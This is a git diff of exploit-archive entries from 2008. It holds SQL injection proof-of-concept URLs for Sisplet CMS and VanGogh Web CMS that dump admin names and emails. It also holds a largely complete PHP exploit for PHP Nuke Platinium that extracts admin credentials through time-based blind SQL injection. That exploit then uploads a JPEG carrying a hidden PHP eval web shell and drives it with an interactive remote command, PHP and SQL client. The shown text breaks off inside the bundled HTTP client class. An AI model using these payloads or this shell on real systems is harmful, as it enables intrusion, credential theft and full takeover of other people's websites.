-[+] http://[Target]/[sisplet_path]/index.php?fl=0&p1=1&p2=15&id=[SQL Injection]
-
-
-------
- POC
-------
-
-[+] http://[Target]/[sisplet_path]/index.php?fl=0&p1=1&p2=15&id=15'/**/AND/**/1=2/**/UNION/**/SELECT/**/concat(ime,0x3a,priimek,0x3a,email),2,3,4/**/FROM/**/administratorji/**/WHERE/**/tip='0
-
-
-##################################################################
-# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
-##################################################################
-
-# milw0rm.com [2008-07-01]
+=================================================================
+  Sisplet CMS (index.php id) Remote SQL Injection Vulnerability
+=================================================================
+
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /           
+  / XXXXXX /
+ (________(             
+  `------'
+
+
+AUTHOR : CWH Underground
+DATE   : 1 July 2008
+SITE   : cwh.citec.us
+
+
+#####################################################
+ APPLICATION : Sisplet CMS
+ VERSION     : 2008-01-24
+ VENDOR      : http://cms.sisplet.org/
+ DOWNLOAD    : http://downloads.sourceforge.net/sisplet/SiSplet-2008-01-24.zip
+#####################################################
+
+--- Remote SQL Injection ---
+
+** Magic Quote must turn off **
+
+-----------------------------------
+ Vulnerable File (function.php)
+-----------------------------------
+
+$sql = mysql_query("SELECT parent FROM menu WHERE id = '$id'");
+
+
+---------
+ Exploit
+---------
+
+[+] http://[Target]/[sisplet_path]/index.php?fl=0&p1=1&p2=15&id=[SQL Injection]
+
+
+------
+ POC
+------
+
+[+] http://[Target]/[sisplet_path]/index.php?fl=0&p1=1&p2=15&id=15'/**/AND/**/1=2/**/UNION/**/SELECT/**/concat(ime,0x3a,priimek,0x3a,email),2,3,4/**/FROM/**/administratorji/**/WHERE/**/tip='0
+
+
+##################################################################
+# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
+##################################################################
+
+# milw0rm.com [2008-07-01]
diff --git a/platforms/php/webapps/5985.txt b/platforms/php/webapps/5985.txt
index e0f8fef20..2dc7d0bce 100755
--- a/platforms/php/webapps/5985.txt
+++ b/platforms/php/webapps/5985.txt
@@ -1,63 +1,63 @@
-===================================================================
-  VanGogh Web CMS (article_ID) Remote SQL Injection Vulnerability
-===================================================================
-
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /           
-  / XXXXXX /
- (________(             
-  `------'
-
-
-AUTHOR : CWH Underground
-DATE   : 1 July 2008
-SITE   : cwh.citec.us
-
-
-#####################################################
- APPLICATION : VanGogh Web CMS
- VERSION     : 0.9
- VENDOR      : http://vangogh.holoclan.de/
- DOWNLOAD    : http://downloads.sourceforge.net/vangogh/vangogh_0_9.zip
-#####################################################
-
-
---- Remote SQL Injection ---
-
------------------------------------
- Vulnerable File (get_article.php)
------------------------------------
-
-@Line
-
-   337:   $sql='SELECT text.content, article.lastchanged, parttypes.tag'
-   338:       .' FROM article,T_A,text,parttypes'
-   339:       .' WHERE article.ID=T_A.AID AND text.ID=T_A.TID AND parttypes.ID=T_A.parttype AND article.ID='.$article_ID;
-   340:
-   341:   $result=mysql_query($sql,$db) or die("$sql : Parse template  Query funktioniert ned");
-
----------
- Exploit
----------
-
-[+] http://[Target]/[vangogh_path]/index.php?article_ID=[SQL Injection]&get_action=article§ion=5
-
-
-------
- POC
-------
-
-[+] http://[Target]/[vangogh_path]/index.php?article_ID=8/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(id,0x3a,title),3/**/FROM/**/section&get_action=article§ion=5
-
-
-##################################################################
-# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
-##################################################################
-
-# milw0rm.com [2008-07-01]
+===================================================================
+  VanGogh Web CMS (article_ID) Remote SQL Injection Vulnerability
+===================================================================
+
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /           
+  / XXXXXX /
+ (________(             
+  `------'
+
+
+AUTHOR : CWH Underground
+DATE   : 1 July 2008
+SITE   : cwh.citec.us
+
+
+#####################################################
+ APPLICATION : VanGogh Web CMS
+ VERSION     : 0.9
+ VENDOR      : http://vangogh.holoclan.de/
+ DOWNLOAD    : http://downloads.sourceforge.net/vangogh/vangogh_0_9.zip
+#####################################################
+
+
+--- Remote SQL Injection ---
+
+-----------------------------------
+ Vulnerable File (get_article.php)
+-----------------------------------
+
+@Line
+
+   337:   $sql='SELECT text.content, article.lastchanged, parttypes.tag'
+   338:       .' FROM article,T_A,text,parttypes'
+   339:       .' WHERE article.ID=T_A.AID AND text.ID=T_A.TID AND parttypes.ID=T_A.parttype AND article.ID='.$article_ID;
+   340:
+   341:   $result=mysql_query($sql,$db) or die("$sql : Parse template  Query funktioniert ned");
+
+---------
+ Exploit
+---------
+
+[+] http://[Target]/[vangogh_path]/index.php?article_ID=[SQL Injection]&get_action=article§ion=5
+
+
+------
+ POC
+------
+
+[+] http://[Target]/[vangogh_path]/index.php?article_ID=8/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(id,0x3a,title),3/**/FROM/**/section&get_action=article§ion=5
+
+
+##################################################################
+# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
+##################################################################
+
+# milw0rm.com [2008-07-01]
diff --git a/platforms/php/webapps/5986.php b/platforms/php/webapps/5986.php
index 0203ad706..849cf4c60 100755
--- a/platforms/php/webapps/5986.php
+++ b/platforms/php/webapps/5986.php
@@ -1,1264 +1,1264 @@
-
-## Date:   02/07/08
-##
-## Note
-## ****
-## I modified a bit phpsploit for this exploit,
-## because PHP Nuke plays with REQUEST_URI var ...
-## 
-## Requirements
-## ************
-## register_globals=On
-##
-## phpreter
-## ********
-## phpreter is really easy to use:
-## You can change mode using "mode=",
-## with  = sql, php or cmd
-##
-## If you want to understand how it work ...
-## read the code.
-##
-## You can take look to unchunk() function, because
-## I think you were many with this problem ...
-##
-
-
-#
-# Configuration
-#
-
-$xpl = new phpsploit();
-
-$xpl->agent('Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14');
-
-print "##\n";
-print "## PHP Nuke Platinium 7.6.b.5\n";
-print "## Remote Code Execution Exploit\n";
-print "## by Charles  F. \n";
-print "## [http://realn.free.fr/]\n";
-print "##\n";
-
-if($argc<3)
-{
-	print "##--- USAGE -----------------------------------------------\n";
-	print "## [c:\]# php nuke_platinium_exploit.php [options]\n";
-	print "##\n";
-	print "##  -url       Target URL\n";
-	print "##  -shell     If you only wan't to load again phpreter,\n";
-	print "##             specify with this param your shell URL\n";
-	print "##  -account   A GOD admin account (optional)\n";
-	print "##             password can be md5 or plain text\n";
-	print "##             user:passwd\n";
-	print "##  -bmark     How many time must pass to consider SQL\n";
-	print "##             returned true (in seconds) and how many\n";
-	print "##             operations you want SQL to do (optional)\n";
-	print "##             default: 4:6000000\n";
-	print "##\n";
-	print "## eg:\n";
-	print "## ./exploit.php -url http://target.net/ -bmark 5:4000000\n";
-	print "## ./exploit.php -url http://target.net/ -admin god:pwd\n";
-	print "## ./exploit.php -shell http://target.net/tmp_1339.php\n";
-	print "##---------------------------------------------------------\n";
-	exit();
-}
-
-# Parameters
-
-$url            = getparam('url');
-$shell_url      = getparam('shell');
-$account        = getparam('account') ? getparam('account') : '';
-$bmark          = getparam('bmark')   ? getparam('bmark')   : '4:6000000';
-
-list($bmark_time, $bmark_numb) = explode(':', $bmark);
-
-if(!$url && !$shell_url)
-{
-	print "## Ok dude, are you an idiot ?\n";
-	exit();
-}
-
-# SQL Configuration for phpreter
-
-$sql = array(
-		'config.php',
-		'$dbhost',
-		'$dbuname',
-		'$dbpass',
-		'$dbname',
-);
-
-if($shell_url)
-{
-	print "##--- SHELL -----------------------------------------------\n";
-	print "## URL: $shell_url\n";
-	print "##---------------------------------------------------------\n";
-
-	$shell = new phpreter($shell_url, '-:-(.*)-:-', 'cmd', $sql, false);
-	
-	exit();
-}
-
-if(!preg_match('#ORDER by date#',$xpl->post($url.'includes/pdf.php',"what=getpdf&table=_blocked_iplist '-")))
-{
-	print "## register_globals=Off, exiting.\n";
-	print "##\n";
-	exit();
-}
-
-#
-# Admin credentials
-#
-
-if(!empty($account))
-{
-	list($aid, $pwd) = explode(':',$account);
-	if(!preg_match('#[a-f0-9]{32}#i',$pwd)) $pwd = md5($pwd);
-}
-
-print "##--- ADMIN -----------------------------------------------\n";
-
-print "## Admin ID: ";
-isset($aid) ? print $aid."\n" : $aid = bmark('aid','abcdefghijklmnopqrstuvwxyz0123456789');
-
-print "## Password: ";
-isset($pwd) ? print $pwd."\n" : $pwd = bmark('pwd','abcdef0123456789');
-
-print "##---------------------------------------------------------\n";
-print "##\n";
-
-#
-# User data
-#
-
-# We set up admin access
-
-$c_admin = base64_encode($aid.':'.$pwd);
-$xpl->addcookie('admin', urlencode($c_admin));
-
-# Ok, now, we need an user for the upload
-
-$query = "SELECT CONCAT(0x3a3a3a,user_id,0x3a,username,0x3a,user_email,0x3a,user_password,0x3a3a3a) FROM nuke_users ORDER BY user_id DESC LIMIT 1";
-$data = sqlexec($query);
-
-$data = explode(':::',$data);
-list($user_id, $user_name, $user_mail, $user_pwd) = explode(':',$data[1]);
-
-$c_user = base64_encode($user_id.':'.$user_name.':'.$user_pwd);
-$xpl->addcookie('user', urlencode($c_user));
-
-# We need a valid SID
-$xpl->get($url.'modules.php?name=Forums&file=profile&mode=editprofile');
-preg_match('#sid" value="([a-f0-9]{32})#i', $xpl->getcontent(), $c_sid);
-
-$c_sid = $c_sid[1];
-$xpl->addcookie('_sid',$c_sid);
-
-print "##--- USER ------------------------------------------------\n";
-print "## User ID : ".$user_id."\n";
-print "## Name    : ".$user_name."\n";
-print "## Mail    : ".$user_mail."\n";
-print "## Password: ".$user_pwd."\n";
-print "##---------------------------------------------------------\n";
-print "##\n";
-
-#
-# Cookies
-#
-
-print "##--- COOKIES -----------------------------------\n";
-print "## user=".$c_user."\n";
-print "## admin=".$c_admin."\n";
-print "##---------------------------------------------------------\n";
-print "##\n";
-
-#
-# File upload
-#
-
-print "## Uploading the file ";
-$rand_filename = 'tmp_'.rand().'.php';
-
-# Step #1: avatar_path='w00t.php\0'
-sqlexec("UPDATE nuke_bbconfig SET config_value='$rand_filename\\0' WHERE config_name='avatar_path'");
-print ".";
-
-# Step #2: JPEG upload (bypassing restrictions)
-
-# $c0de contains as a jpeg comment
-# print '-:-';eval(stripslashes($_SERVER['HTTP_SHELL']));print '-:-';
-#
-# To people who is laughing to me when I stripslashes() the header:
-# On specifics servers, HTTP headers are addslashed.
-# This gave, in fact, the attack #2 in my Nuked-Klan sploit.
-#
-$c0de = ""
-. "\xff\xd8\xff\xe0\x00\x10\x4a\x46\x49\x46\x00\x01\x01\x01\x00\x60"
-. "\x00\x60\x00\x00\xff\xdb\x00\x43\x00\x08\x06\x06\x07\x06\x05\x08"
-. "\x07\x07\x07\x09\x09\x08\x0a\x0c\x14\x0d\x0c\x0b\x0b\x0c\x19\x12"
-. "\x13\x0f\x14\x1d\x1a\x1f\x1e\x1d\x1a\x1c\x1c\x20\x24\x2e\x27\x20"
-. "\x22\x2c\x23\x1c\x1c\x28\x37\x29\x2c\x30\x31\x34\x34\x34\x1f\x27"
-. "\x39\x3d\x38\x32\x3c\x2e\x33\x34\x32\xff\xdb\x00\x43\x01\x09\x09"
-. "\x09\x0c\x0b\x0c\x18\x0d\x0d\x18\x32\x21\x1c\x21\x32\x32\x32\x32"
-. "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-. "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-. "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\xff\xfe"
-. "\x00\x4e\x3c\x3f\x70\x68\x70\x20\x70\x72\x69\x6e\x74\x20\x27\x2d"
-. "\x3a\x2d\x27\x3b\x65\x76\x61\x6c\x28\x73\x74\x72\x69\x70\x73\x6c"
-. "\x61\x73\x68\x65\x73\x28\x24\x5f\x53\x45\x52\x56\x45\x52\x5b\x27"
-. "\x48\x54\x54\x50\x5f\x53\x48\x45\x4c\x4c\x27\x5d\x29\x29\x3b\x70"
-. "\x72\x69\x6e\x74\x20\x27\x2d\x3a\x2d\x27\x3b\x20\x3f\x3e\xff\xc0"
-. "\x00\x11\x08\x00\x01\x00\x01\x03\x01\x22\x00\x02\x11\x01\x03\x11"
-. "\x01\xff\xc4\x00\x1f\x00\x00\x01\x05\x01\x01\x01\x01\x01\x01\x00"
-. "\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09"
-. "\x0a\x0b\xff\xc4\x00\xb5\x10\x00\x02\x01\x03\x03\x02\x04\x03\x05"
-. "\x05\x04\x04\x00\x00\x01\x7d\x01\x02\x03\x00\x04\x11\x05\x12\x21"
-. "\x31\x41\x06\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xa1\x08\x23"
-. "\x42\xb1\xc1\x15\x52\xd1\xf0\x24\x33\x62\x72\x82\x09\x0a\x16\x17"
-. "\x18\x19\x1a\x25\x26\x27\x28\x29\x2a\x34\x35\x36\x37\x38\x39\x3a"
-. "\x43\x44\x45\x46\x47\x48\x49\x4a\x53\x54\x55\x56\x57\x58\x59\x5a"
-. "\x63\x64\x65\x66\x67\x68\x69\x6a\x73\x74\x75\x76\x77\x78\x79\x7a"
-. "\x83\x84\x85\x86\x87\x88\x89\x8a\x92\x93\x94\x95\x96\x97\x98\x99"
-. "\x9a\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6\xb7"
-. "\xb8\xb9\xba\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4\xd5"
-. "\xd6\xd7\xd8\xd9\xda\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf1"
-. "\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xff\xc4\x00\x1f\x01\x00\x03"
-. "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x01"
-. "\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\xff\xc4\x00\xb5\x11\x00"
-. "\x02\x01\x02\x04\x04\x03\x04\x07\x05\x04\x04\x00\x01\x02\x77\x00"
-. "\x01\x02\x03\x11\x04\x05\x21\x31\x06\x12\x41\x51\x07\x61\x71\x13"
-. "\x22\x32\x81\x08\x14\x42\x91\xa1\xb1\xc1\x09\x23\x33\x52\xf0\x15"
-. "\x62\x72\xd1\x0a\x16\x24\x34\xe1\x25\xf1\x17\x18\x19\x1a\x26\x27"
-. "\x28\x29\x2a\x35\x36\x37\x38\x39\x3a\x43\x44\x45\x46\x47\x48\x49"
-. "\x4a\x53\x54\x55\x56\x57\x58\x59\x5a\x63\x64\x65\x66\x67\x68\x69"
-. "\x6a\x73\x74\x75\x76\x77\x78\x79\x7a\x82\x83\x84\x85\x86\x87\x88"
-. "\x89\x8a\x92\x93\x94\x95\x96\x97\x98\x99\x9a\xa2\xa3\xa4\xa5\xa6"
-. "\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xc2\xc3\xc4"
-. "\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xe2"
-. "\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9"
-. "\xfa\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf7"
-. "\xfa\x28\xa2\x80\x3f\xff\xd9\xd9";
-
-$data = array(
-		frmdt_url => $url.'modules.php?name=Forums&file=profile',
-		'avatar' => array(frmdt_filename => '1.jpg', frmdt_type => 'image/jpeg', frmdt_content => $c0de),
-		'username' => $user_name,       'email' => $user_mail,
-		'cur_password' => '',           'new_password' => '',
-		'password_confirm' => '',       'icq' => '',
-		'aim' => '',                    'msn' => '',
-		'yim' => '',                    'website' => '',
-		'location' => '',               'occupation' => '',
-		'interests' => '',              'b_day' => '1',
-		'b_md' => '1',                  'b_year' => '1111',
-		'gender' => '1',                'viewemail' => '0',
-		'hideonline' => '1',            'notifyreply' => '0',
-		'notifypm' => '0',              'popup_pm' => '0',
-		'attachsig' => '1',             'allowbbcode' => '1',
-		'allowhtml' => '1',             'allowsmilies' => '1',
-		'showquickreply' => '0',        'user_wordwrap' => '70',
-		'language' => 'english',        'style' => '1',
-		'timezone' => '-6',             'dateformat' => 'Y-m-d, H:i:s',
-		'MAX_FILE_SIZE' => '99999',     'avatarurl' => '',
-		'avatarremoteurl' => '',        'mode' => 'editprofile',
-		'agreed' => 'true',             'coppa' => '0',
-		'sid' => $c_sid,                'user_id' => $user_id,
-		'current_email' => $user_mail,  'submit' => 'Submit',
-);
-
-$xpl->formdata($data);
-print ".";
-
-# Step #3: avatar_path='modules/Forums/images/avatars'
-sqlexec("UPDATE nuke_bbconfig SET config_value='modules/Forums/images/avatars' WHERE config_name='avatar_path'");
-print ".\n";
-
-# Shell is uploaded, let's load it
-
-$shell_url  = $url.$rand_filename;
-
-print "##\n";
-print "##--- SHELL -----------------------------------------------\n";
-print "## URL: $shell_url\n";
-print "##---------------------------------------------------------\n";
-
-$shell = new phpreter($shell_url, '-:-(.*)-:-', 'cmd', $sql, false);
-
-#
-# Execute SQL Queries
-#
-function sqlexec($query)
-{
-	global $xpl,$url;
-	
-	$xpl->post($url.'modules/Forums/admin/admin_genesismyadmin.php','this_query='.urlencode($query).'&submit=&with_selected=optimize');
-	
-	return $xpl->getcontent();
-}
-
-#
-# Bmark SQL Injection Function
-#
-function bmark($query,$charset)
-{
-	global $xpl,$url,$data,$bmark_time,$bmark_numb;
-	
-	$d=0; $v='';$max=32;
-	
-	$query = 'SELECT '.$query.' FROM nuke_authors WHERE radminsuper=1 ORDER BY aid LIMIT 1';
-	
-	$data = "what=getpdf&table=_blocked_iplist+WHERE+IF((),BENCHMARK($bmark_numb,MD5(0x616161)),1)=1 --";
-	
-	while($d<$max)
-	{
-		$d++;
-		for($z=0;$zpost($url."includes/pdf.php", str_replace('',$sql,$data) );
-			
-			if(time()-$date>$bmark_time)
-			{
-				print strtolower(chr($f));
-				$v .= chr($f);
-				break;
-			}
-		}
-		if(strlen($v)==$save) break;
-		$save = strlen($v);
-	}
-	
-	print "\n";
-	return $v;
-}
-
-function getparam($param,$opt='')
-{
-	global $argv;
-	foreach($argv as $value => $key)
-	{
-		if($key == '-'.$param) return $argv[$value+1];
-	}
-	if($opt) exit("\n-$param parameter required");
-	else return;
-}
-
-
-/*
- * Copyright (c) real
- *
- * This program is free software; you can redistribute it and/or 
- * modify it under the terms of the GNU General Public License 
- * as published by the Free Software Foundation; either version 2 
- * of the License, or (at your option) any later version. 
- * 
- * This program is distributed in the hope that it will be useful, 
- * but WITHOUT ANY WARRANTY; without even the implied warranty of 
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
- * GNU General Public License for more details. 
- * 
- * You should have received a copy of the GNU General Public License 
- * along with this program; if not, write to the Free Software 
- * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
- *
- * TITLE:          PHPreter
- * AUTHOR:         Charles "real" F.
- * VERSION:        1.0
- * LICENSE:        GNU General Public License
- *
- * This is a really simple class with permits to exec SQL, PHP or CMD
- * on a remote host using the HTTP "Shell" header.
- *
- */
-
-class phpreter
-{
-	var $url;
-	var $host;
-	var $port;
-	var $page;
-	
-	var $mode;
-	
-	var $ssql;
-	
-	var $prompt;
-	var $phost;
-	
-	var $regex;
-	var $data;
-	
-	/**
-	 * __construct()
-	 *
-	 * @param url      The url of the remote shell.
-	 * @param regexp   The regex to catch cmd result.
-	 * @param mode     Mode: php, sql or cmd.
-	 * @param sql      An array with the file to include,
-	 *                 and sql vars
-	 * @param clear    Determines if clear() is called
-	 *                 on startup
-	 */
-	function __construct($url, $regexp='^(.*)$', $mode='cmd', $sql=array(), $clear=true)
-	{
-		$this->url = $url;
-		
-		$this->regex = '#'.$regexp.'#is';
-		
-		#
-		# Set important data
-		#
-		
-		$infos = parse_url($this->url);
-		$this->host = $infos['host'];
-		$this->port = isset($infos['port']) ? $infos['port'] : 80;
-		$this->page = $infos['path'];
-		unset($infos);
-		
-		# www.(site).com
-		$host_tmp = explode('.',$this->host);
-		$this->phost = $host_tmp[ count($host_tmp)-2 ];
-		unset($host_tmp);
-		
-		#
-		# Set up MySQL connection string
-		#
-		if(!sizeof($sql)) $this->ssql = '';
-		elseif(sizeof($sql)==5)
-		{
-			$this->ssql = "include('$sql[0]');"
-			            . "mysql_connect($sql[1], $sql[2], $sql[3]);"
-				    . "mysql_select_db($sql[4]);";
-		}
-		else
-		{
-			$this->ssql = ""
-			            . "mysql_connect('$sql[0]', '$sql[1]', '$sql[2]');"
-				    . "mysql_select_db('$sql[3]');";
-		}
-		
-		$this->setmode($mode);
-		
-		#
-		# Main Loop
-		#
-
-		if($clear) $this->clear();
-		print $this->prompt;
-
-		while(!preg_match('#^(quit|exit|close)$#i',($cmd = trim(fgets(STDIN)))))
-		{
-			# change mode
-			if(preg_match('#^(set )?mode(=| )(sql|cmd|php)$#i',$cmd,$array)) $this->setmode($array[3]);
-			
-			# clear data
-			elseif(preg_match('#^clear$#i',$cmd)) $this->clear();
-			
-			# else
-			else print $this->exec($cmd);
-			
-			print $this->prompt;
-		}
-	}
-	
-	/**
-	 * clear()
-	 * Just clears ouput, printing '\n'x50
-	 */
-	function clear()
-	{
-		print str_repeat("\n",50);
-		return 0;
-	}
-	
-	/**
-	 * setmode()
-	 * Set mode (PHP, CMD, SQL)
-	 * You don't have to call it.
-	 * use mode=[php|cmd|sql] instead,
-	 * in the prompt.
-	 */
-	function setmode($newmode)
-	{
-		$this->mode = strtolower($newmode);
-		$this->prompt = '['.$this->phost.']['.$this->mode.']# ';
-		
-		switch($this->mode)
-		{
-			case 'cmd':
-				$this->data = 'system(\'\');';
-				break;
-			case 'php':
-				$this->data = '';
-				break;
-			case 'sql':
-				$this->data = $this->ssql
-				            . '$q = mysql_query(\'\') or print(mysql_error());'
-					    . 'print str_repeat("-",50)."\n";'
-					    . 'while($r=mysql_fetch_array($q,MYSQL_ASSOC))'
-					    . '{'
-					    . 	'foreach($r as $k=>$v) print " ".$k.str_repeat(" ", (20-strlen($k)))."| $v\n";'
-					    . 	'print str_repeat("-",50)."\n";'
-					    . '}';
-				break;
-		}
-		return $this->mode;
-	}
-
-	/**
-	 * exec()
-	 * Execute any query and catch the result.
-	 * You don't have to call it.
-	 */
-	function exec($cmd)
-	{
-		if(!strlen($this->data))	$shell = $cmd;
-		else				$shell = str_replace('',addslashes($cmd),$this->data);
-		
-		$fp = fsockopen($this->host, $this->port, &$errno, &$errstr, 30);
-		
-		$req  = "GET ".$this->page." HTTP/1.1\r\n";
-		$req .= "Host: ". $this->host . ( $this->port!=80 ? ':'.$this->port : '' ) ."\r\n";
-		$req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\r\n";
-		$req .= "Shell: $shell\r\n";
-		$req .= "Content-transfert-encoding: base64\r\n";
-		$req .= "Connection: close\r\n\r\n";
-		
-		unset($shell);
-
-		fputs($fp,$req);
-		
-		$content = '';
-		while(!feof($fp)) $content .= fgets($fp,128);
-		
-		fclose($fp);
-		
-		# Remove headers
-		$data = explode("\r\n\r\n",$content);
-		array_shift($data);
-		$content = implode("\r\n\r\n",$data);
-		
-		$content = $this->unchunk($content);
-	
-		preg_match($this->regex,$content,$data);
-		
-		if($data[1][ strlen($data)-1 ] != "\n") $data[1] .= "\n";
-		
-		return $data[1];
-	}
-	
-	/**
-	 * unchunk()
-	 * This function aims to remove chunked content sizes which
-	 * are putted by apache server when it uses chunked
-	 * transfert-encoding.
-	 */
-	function unchunk($data)
-	{
-		$dsize  = 1;
-		$offset = 0;
-		
-		while($dsize>0)
-		{
-			$hsize_size = strpos($data, "\r\n", $offset) - $offset;
-			
-			$hsize = substr($data, $offset, $hsize_size);
-			$dsize = hexdec($hsize);
-			
-			/*
-			print "offset (dec) = $offset\n";
-			print "hsize  (hex) = $hsize\n";
-			print "dsize  (dec) = $dsize\n";
-			print "crlfp  (dec) = $hsize_size\n";
-			print "--\n";
-			*/
-			
-			# Remove $hsize\r\n from $data
-			$data = substr($data, 0, $offset) . substr($data, ($offset + $hsize_size + 2) );
-			
-			$offset += $dsize;
-			
-			# Remove the \r\n before the next $hsize
-			$data = substr($data, 0, $offset) . substr($data, ($offset+2) );
-		}
-		
-		return $data;
-	}
-}
-
-/*
- * 
- * Copyright (C) darkfig
- * 
- * This program is free software; you can redistribute it and/or 
- * modify it under the terms of the GNU General Public License 
- * as published by the Free Software Foundation; either version 2 
- * of the License, or (at your option) any later version. 
- * 
- * This program is distributed in the hope that it will be useful, 
- * but WITHOUT ANY WARRANTY; without even the implied warranty of 
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
- * GNU General Public License for more details. 
- * 
- * You should have received a copy of the GNU General Public License 
- * along with this program; if not, write to the Free Software 
- * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
- * 
- * TITLE:          PhpSploit Class
- * REQUIREMENTS:   PHP 4 / PHP 5
- * VERSION:        2.0
- * LICENSE:        GNU General Public License
- * ORIGINAL URL:   http://www.acid-root.new.fr/tools/03061230.txt
- * FILENAME:       phpsploitclass.php
- *
- * CONTACT:        gmdarkfig@gmail.com (french / english)
- * GREETZ:         Sparah, Ddx39
- *
- * DESCRIPTION:
- * The phpsploit is a class implementing a web user agent.
- * You can add cookies, headers, use a proxy server with (or without) a
- * basic authentification. It supports the GET and the POST method. It can
- * also be used like a browser with the cookiejar() function (which allow
- * a server to add several cookies for the next requests) and the
- * allowredirection() function (which allow the script to follow all
- * redirections sent by the server). It can return the content (or the
- * headers) of the request. Others useful functions can be used for debugging.
- * A manual is actually in development but to know how to use it, you can
- * read the comments.
- *
- * CHANGELOG:
- *
- * [2007-06-10] (2.0)
- *  * Code: Code optimization
- *  * New: Compatible with PHP 4 by default
- *
- * [2007-01-24] (1.2)
- *  * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
- *  * New: multipart/form-data enctype is now supported 
- *
- * [2006-12-31] (1.1)
- *  * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
- *  * New: You can now call the getheader() / getcontent() function without parameters
- *
- * [2006-12-30] (1.0)
- *  * First version
- * 
- */
-
-class phpsploit
-{
-	var $proxyhost;
-	var $proxyport;
-	var $host;
-	var $path;
-	var $port;
-	var $method;
-	var $url;
-	var $packet;
-	var $proxyuser;
-	var $proxypass;
-	var $header;
-	var $cookie;
-	var $data;
-	var $boundary;
-	var $allowredirection;
-	var $last_redirection;
-	var $cookiejar;
-	var $recv;
-	var $cookie_str;
-	var $header_str;
-	var $server_content;
-	var $server_header;
-	
-
-	/**
-	 * This function is called by the
-	 * get()/post()/formdata() functions.
-	 * You don't have to call it, this is
-	 * the main function.
-	 *
-	 * @access private
-	 * @return string $this->recv ServerResponse
-	 * 
-	 */
-	function sock()
-	{
-		if(!empty($this->proxyhost) && !empty($this->proxyport))
-		   $socket = @fsockopen($this->proxyhost,$this->proxyport);
-		else
-		   $socket = @fsockopen($this->host,$this->port);
-		
-		if(!$socket)
-		   die("Error: Host seems down");
-		
-		# modification (by real)
-		preg_match("#^http://[^/]+(/.*)$#i", $this->url, $tmp);
-		$tmp = $tmp[1];
-		
-		if($this->method=='get')
-		   $this->packet = 'GET '.$tmp." HTTP/1.1\r\n";
-		   
-		elseif($this->method=='post' or $this->method=='formdata')
-		   $this->packet = 'POST '.$tmp." HTTP/1.1\r\n";
-		   
-		else
-		   die("Error: Invalid method");
-		
-		if(!empty($this->proxyuser))
-		   $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n";
-		
-		if(!empty($this->header))
-		   $this->packet .= $this->showheader();
-		   
-		if(!empty($this->cookie))
-		   $this->packet .= 'Cookie: '.$this->showcookie()."\r\n";
-	
-		$this->packet .= 'Host: '.$this->host."\r\n";
-		$this->packet .= "Connection: Close\r\n";
-		
-		if($this->method=='post')
-		{
-			$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
-			$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
-			$this->packet .= $this->data."\r\n";
-		}
-		elseif($this->method=='formdata')
-		{
-			$this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n";
-			$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
-			$this->packet .= $this->data;
-		}
-
-		$this->packet .= "\r\n";
-		$this->recv = '';
-
-		fputs($socket,$this->packet);
-
-		while(!feof($socket))
-		   $this->recv .= fgets($socket);
-
-		fclose($socket);
-
-		if($this->cookiejar)
-		   $this->getcookie();
-
